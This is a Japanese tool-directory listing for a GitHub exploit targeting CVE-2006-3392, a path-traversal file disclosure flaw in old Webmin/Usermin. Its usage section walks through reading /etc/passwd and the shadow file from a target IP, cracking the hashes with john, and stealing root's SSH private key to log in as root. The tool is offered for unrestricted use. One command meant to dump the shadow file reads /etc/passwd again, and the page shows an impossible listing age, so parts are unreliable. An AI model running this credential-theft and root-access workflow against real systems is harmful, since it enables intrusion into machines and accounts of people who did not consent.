Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2006-3392 — Webmin < 1.290 / Usermin < 1.220 - 任意のファイル開示 | Kitploit
ツール/GitHubGitHub/g1vi/cve-2006-3392
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubg1vi/cve-2006-3392

CVE-2006-3392

Webmin < 1.290 / Usermin < 1.220 - 任意のファイル開示

リポジトリを見る
122年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2006-3392

https://www.cvedetails.com/cve/CVE-2006-3392/

Webmin 1.290未満およびUsermin 1.220未満では、HTMLをデコードする前にsimplify_path関数を呼び出します。これにより、リモート攻撃者が任意のファイルを読み取ることが可能になります。例えば、"..%01"シーケンスを使用して、"../"シーケンスの除去をバイパスし、その後"%01"などのバイトがファイル名から削除される前に攻撃が行われます。注: これはCVE-2006-3274とは異なる問題です。

使用方法

ルート権限でファイルシステム上の任意のファイルを閲覧する

root@kitploit:~
./exploit.sh <ターゲットIP> <ターゲットポート> <開示するファイル>

例

10.10.11.105上でpasswdとshadowを閲覧し、unshadowしてハッシュをクラックする

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<お好みのワードリスト> unshadowed

10.10.11.105上で秘密RSA鍵を閲覧する

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]

ライセンス

いつでもどこでも自由に使用または改変してください。

ツールをダウンロード